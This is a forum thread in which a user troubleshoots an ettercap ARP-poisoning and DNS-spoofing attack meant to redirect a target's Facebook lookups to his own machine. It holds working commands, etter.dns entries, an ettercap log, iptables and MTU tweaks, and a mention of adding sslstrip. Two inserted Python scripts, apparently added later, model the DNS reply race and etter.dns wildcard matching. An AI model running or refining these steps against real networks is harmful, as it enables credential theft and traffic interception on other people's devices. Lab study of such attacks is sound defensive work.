This is going to be my first post here, but I've looked for the answer and found nothing.
My environment is as follows:
Target box: MacBook Pro running Snow Leopard (192.168.1.78).
Attacker: Acer Aspire One running BT 5r3 with a wireless network adapter (192.168.1.64).
Both inside the local network with a 2Wire router (192.168.1.254).
I'm trying to do DNS spoofing to redirect DNS requests (facebook) from the target to a local IP (192.168.1.64).
In my first attempts I used ettercap. I edited the etter.dns file as follows: "*.facebook.com A 192.168.1.64" and then I ran the command "ettercap -Tqi wlan1 -P dns_spoof -M arp /192.168.1.78/ /192.168.1.254/"
After that I verified that the man-in-the-middle attack was working correctly, as I could capture traffic between the target and the router.
However, the DNS spoof didn't work; the target could enter Facebook without trouble.
I rebooted the attacker computer into the native Win7 and ran Cain & Abel. Started the sniffer, selected the target, modified the ARP-DNS, poisoned, and even though I got full routing the spoofing continued failing.
I switched machines, making the Aspire One the target, and booted my MacBook with the BT 5r3 live CD. Did the same procedure and failed.
I seem to be unable to do the DNS spoofing and I want to know why.
So my question would be: what am I missing? What changes do I need to perform? Do I need to modify my network settings?
Thank you all for your help.
I searched the forum for an answer and even though there are several threads on this topic, none addressed my problem, as I seem to fail no matter what program (ettercap, C&A, dnsspoof, etc.) I run.
Hi. The router has probably cached the address and can serve it up quicker than the attacker's replies. You will have to wait approx. 20 mins without going to the site, or try some random URL in ettercap before going to the site.
I see, so the attacker would have to be quicker than the router? Or is there another way? How can I corroborate that?
I'll try your suggestion and reply!
Thanks!
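Added example (my own code, not ettercap's and not posted by anyone in this thread) illustrating the reply above and the "how can I corroborate that" question: a stub resolver accepts the first UDP reply whose transaction ID and question section match its outstanding query and ignores everything that arrives afterwards, so whichever answer reaches the target first decides where it connects. The script builds a query and two competing answers carrying the same TXID, one standing in for the router's cached answer (203.0.113.10 is a constructed placeholder address, not Facebook's) and one for the dns_spoof forgery (192.168.1.64), and shows the outcome flipping with arrival order. A reply with the wrong TXID is ignored, which is also why a forged answer has to copy the ID from the sniffed query.

```python
"""Added example: the DNS reply race a dns_spoof attacker has to win.
Not part of the original thread; all packets are constructed inline."""
import struct


def encode_name(name):
    # "www.facebook.com" -> b"\x03www\x08facebook\x03com\x00"
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def decode_name(data, offset):
    """Return (name, offset after the name), following compression pointers."""
    labels = []
    while True:
        length = data[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0 == 0xC0:  # pointer (RFC 1035 section 4.1.4)
            ptr = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            name, _ = decode_name(data, ptr)
            labels.append(name)
            return ".".join(labels), offset + 2
        labels.append(data[offset + 1:offset + 1 + length].decode())
        offset += 1 + length


def build_query(txid, name):
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD, 1 question
    return header + encode_name(name) + struct.pack("!HH", 1, 1)  # A, IN


def build_reply(txid, name, ip, ttl=60):
    """Minimal answer: same TXID, QR|RD|RA flags, question echoed, one A record."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    rdata = bytes(int(o) for o in ip.split("."))
    # 0xC00C = pointer to the question name at offset 12
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata
    return header + question + answer


def parse_reply(data):
    txid, flags, qdcount, ancount = struct.unpack("!HHHH", data[:8])
    qname, off = decode_name(data, 12)
    off += 4  # skip QTYPE/QCLASS
    ips = []
    for _ in range(ancount):
        _, off = decode_name(data, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            ips.append(".".join(str(b) for b in data[off:off + 4]))
        off += rdlen
    return {"txid": txid, "qr": bool(flags & 0x8000), "qname": qname, "ips": ips}


def resolve(query, replies_in_arrival_order):
    """Stub-resolver behaviour: take the first reply that answers *this* query."""
    q = parse_reply(query)  # works for a query too (ancount == 0)
    for raw in replies_in_arrival_order:
        r = parse_reply(raw)
        if r["qr"] and r["txid"] == q["txid"] and r["qname"].lower() == q["qname"].lower():
            return r["ips"][0] if r["ips"] else None
    return None


def demo():
    txid = 0x1A2B
    query = build_query(txid, "www.facebook.com")
    real = build_reply(txid, "www.facebook.com", "203.0.113.10")   # router's cached answer (placeholder IP)
    forged = build_reply(txid, "www.facebook.com", "192.168.1.64")  # attacker's dns_spoof answer
    stale = build_reply(txid ^ 1, "www.facebook.com", "192.168.1.64")  # forgery with a wrong TXID
    return {
        "router_first": resolve(query, [real, forged]),
        "attacker_first": resolve(query, [forged, real]),
        "wrong_txid": resolve(query, [stale, real]),
    }


if __name__ == "__main__":
    print(demo())
```

To check the same thing on the real target, capture UDP port 53 on the target's own interface (for example `tcpdump -ni en1 udp port 53` on the Mac) while it looks up the name: if two replies with the same transaction ID show up, the one that arrived first is the one the target used, and the source address tells you whether that was the router or the attacker.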
Hey! Thanks for the advice; however, it still doesn't work, although I got more info.
I modified the etter.dns like "* A 192.168.1.74" so as to redirect all requests to my attacker. Not all pages worked; however, I typed a random site (blop.com) and it got redirected. Strangely, I did it again (akash.com) and it said that it couldn't find the host.
I tried spoofing other sites like Wikipedia, Grooveshark, Gmail, Hotmail and other popular websites without luck.
Could I reconfigure the router so it allows the attack?
Thanks!
Sorry for the multiple replies, but I'm experimenting.
So I used Ethernet with my attacker and got more results.
I also changed the etter.dns to say this:
facebook.com A 192.168.1.77
*.facebook.com A 192.168.1.77
www.facebook.com PTR 192.168.1.77
And the command in ettercap to redirect the traffic from all of my network:
'ettercap -Tqi eth0 -P dns_spoof -M arp // /192.168.1.254/'
After that I got these errors (although it says it is spoofing, my targets see no changes to their requests; they go to the real site):
dns_spoof: [es-la.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [fr-fr.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [pt-br.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [de-de.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [it-it.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [ar-ar.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [hi-in.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [zh-cn.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [ja-jp.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [developers.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [zh-cn.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [ja-jp.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [developers.facebook.com] spoofed to [192.168.1.77]
DHCP: [192.168.1.254] OFFER : 192.168.1.77 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254
dns_spoof: [zh-cn.facebook.com] spoofed to [192.168.1.77]
SEND L3 ERROR: 1591 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))
SEND L3 ERROR: 1525 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))
SEND L3 ERROR: 1525 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))
SEND L3 ERROR: 1525 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))
dns_spoof: [ja-jp.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [developers.facebook.com] spoofed to [192.168.1.77]
DHCP: [192.168.1.254] ACK : 192.168.1.77 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "gateway.2wire.net"
dns_spoof: [ja-jp.facebook.com] spoofed to [192.168.1.77]
DHCP: [192.168.1.254] ACK : 192.168.1.77 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "gateway.2wire.net"
dns_spoof: [developers.facebook.com] spoofed to [192.168.1.77]
SEND L3 ERROR: 2932 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))
SEND L3 ERROR: 1593 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))
You could try dropping packets from the router, "iptables -A INPUT -p udp --sport 53 -s 192.168.1.254 -j DROP", to see if it's replying first.
I had a similar issue to what you were experiencing with ettercap and dns_spoof. This is what I did in my etter.dns to fix it:
facebook.com A attacker.ip.here
*.facebook.com A attacker.ip.here
www.facebook.com PTR attacker.ip.here
After that, it worked like a charm. Not sure if yours was the same issue, but it worked for me.
Also, for me I found out (which is not your case) that using VirtualBox to a regular PC broke it for me as well. The attack would however work from PC to PC and sometimes from VM (VBox) to VM (VBox).
Hope that helps!
-DV
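Added example (my own code, not DV's and not ettercap's source) showing one reason the three-line etter.dns block in the reply above behaves differently from a lone wildcard line: it is a small glob matcher modelled on the etter.dns syntax. It assumes, as the wildcard in the posted entries suggests, that `*` stands for "any characters", so `*.facebook.com` matches hosts under facebook.com but not the bare apex `facebook.com`, which needs its own line. The exact matching rules inside ettercap are an assumption here, as is the simplified three-field line format the parser accepts; the sample files are constructed from the entries posted in this thread.

```python
"""Added example: simplified etter.dns matching, not ettercap's own code.
Assumes '*' means 'any characters' and that first matching rule wins."""
import fnmatch


def parse_etter_dns(text):
    """Parse 'host TYPE target' lines; '#' starts a comment. Simplified format."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        host, rtype, target = line.split()
        rules.append((host.lower().rstrip("."), rtype.upper(), target))
    return rules


def lookup(rules, name, rtype="A"):
    """Return the spoof target for a queried name, or None if no rule matches."""
    name = name.lower().rstrip(".")
    for host, rt, target in rules:
        if rt == rtype and fnmatch.fnmatchcase(name, host):
            return target
    return None


# Constructed from the thread: the first attempt used only the wildcard line.
ONLY_WILDCARD = "*.facebook.com A 192.168.1.64\n"

# Constructed from DV's reply: apex, wildcard and a PTR entry.
FULL = """\
facebook.com      A   192.168.1.64
*.facebook.com    A   192.168.1.64
www.facebook.com  PTR 192.168.1.64
"""


def compare(names):
    """For each name, (result with the wildcard-only file, result with the full file)."""
    wildcard_only = parse_etter_dns(ONLY_WILDCARD)
    full = parse_etter_dns(FULL)
    return {n: (lookup(wildcard_only, n), lookup(full, n)) for n in names}


if __name__ == "__main__":
    for name, (a, b) in compare(
        ["facebook.com", "www.facebook.com", "es-la.facebook.com", "facebook.com.example"]
    ).items():
        print(f"{name:28s} wildcard-only -> {a}   full -> {b}")
```

The apex name is the one that falls through with a wildcard-only file, so a target typing just "facebook.com" would get a real answer while subdomains like es-la.facebook.com are spoofed; the thread's log, which shows only subdomains being spoofed, is consistent with that. Names that merely contain "facebook.com" in the middle (facebook.com.example) match neither file.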
Thank you for the tip; however, that is exactly what I did. I haven't managed to make it work yet; however, I believe it has something to do with my PC specs... I tried also modifying the etter.conf to run it as root and use iptables.
I really don't understand where the problem is...
I did however find out that while facebook.com doesn't get redirected, developers.facebook.com does. My account runs with HTTPS (SSL), so perhaps there is a way to use sslstrip with ettercap together...
although I don't know how to do that...
Another thing is that changing the spoofed site to www.bopibloop.com, which actually doesn't exist, still doesn't get redirected...
I'll keep researching and post a solution if I find one.
Hi Ditto
With this, can you try ifconfig eth0 mtu 1700 up
"SEND L3 ERROR: 1525 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))"
Hey! Sorry for the delay in answering...
There has been no progress, but I'm inclined to believe this has to do with the modem.
I'll try other methods for DNS spoofing.
I'll write back when I figure it out; however, I would appreciate suggestions!